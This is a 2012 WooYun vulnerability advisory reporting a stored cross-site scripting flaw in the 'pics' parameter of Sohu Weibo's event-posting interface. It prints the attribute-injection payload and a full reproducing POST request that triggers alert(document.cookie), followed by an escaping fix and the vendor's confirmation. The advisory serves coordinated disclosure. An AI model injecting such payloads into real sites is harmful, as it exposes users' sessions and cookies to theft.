当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013232

漏洞标题:搜狐微博存储型XSS漏洞二

相关厂商:搜狐

漏洞作者: 心伤的胖子

提交时间:2012-10-11 08:46

修复时间:2012-11-25 08:46

公开时间:2012-11-25 08:46

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-11: 细节已通知厂商并且等待厂商处理中
2012-10-12: 厂商已经确认,细节仅向厂商公开
2012-10-22: 细节向核心白帽子及相关领域专家公开
2012-11-01: 细节向普通白帽子公开
2012-11-11: 细节向实习白帽子公开
2012-11-25: 细节向公众公开

简要描述:

之前提交的这个漏洞还没有修复,http://www.wooyun.org/bugs/wooyun-2012-012756。
同样的漏洞还存在其他的地方。

详细说明:

详细可以参考 WooYun: 搜狐微博存储型XSS漏洞 ,漏洞原理一样,只是接口不一样的。
这次出现的接口是为活动的发微博接口。
漏洞出现在pics参数中,输入和输出的时候都没有进行处理,造成漏洞出现。

pics=[{"url":"http://s2.t.itc.cn/x.jpg\" onload=\"alert(1)\" a=\"","extraData":{"smallest":{"w":119, "h":118, "size":3073},"small":{"w":160, "h":158, "size":3973},"middle":{"w":461, "h":456, "size":14283},"big":{"w":461, "h":456, "size":14283}}}]


如下的POST包内容可以重现漏洞

POST /event/apply HTTP/1.1
Host: t.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://t.sohu.com/event/44691
Content-Length: 18
Cookie: …………
Pragma: no-cache
Cache-Control: no-cache
aid=44691&pics=%5B%7B%22url%22%3A%22http%3A%2F%2Fs2.t.itc.cn%2Fx.jpg%5C%22+onload%3D%5C%22alert(document.cookie)%5C%22+a%3D%5C%22%22%2C%22extraData%22%3A%7B%22smallest%22%3A%7B%22w%22%3A119%2C+%22h%22%3A118%2C+%22size%22%3A3073%7D%2C%22small%22%3A%7B%22w%22%3A160%2C+%22h%22%3A158%2C+%22size%22%3A3973%7D%2C%22middle%22%3A%7B%22w%22%3A461%2C+%22h%22%3A456%2C+%22size%22%3A14283%7D%2C%22big%22%3A%7B%22w%22%3A461%2C+%22h%22%3A456%2C+%22size%22%3A14283%7D%7D%7D%5D&msg=test%20@aa%20@bb


漏洞证明:

看图

修复方案:

1、对传入的json数据显示的时候进行转义处理。

版权声明:转载请注明来源 心伤的胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-12 10:28

厂商回复:

最新状态:

暂无